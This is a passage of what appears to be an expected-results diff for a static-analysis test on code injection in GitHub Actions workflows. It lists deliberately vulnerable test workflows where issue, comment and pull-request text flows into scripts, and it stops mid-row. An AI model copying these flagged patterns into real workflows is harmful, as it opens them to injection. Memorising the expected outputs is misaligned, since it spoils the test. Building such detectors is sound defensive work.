| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | .github/workflows/composite-action-caller-1.yml | +| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | .github/workflows/argus_case_study.yml | +| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning1.yml | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning2.yml | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning3.yml | +| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning4.yml | +| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning5.yml | +| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | +| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | +| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning7.yml | +| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning8.yml | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | .github/workflows/image_link_generator.yml | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | .github/workflows/level1.yml | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | 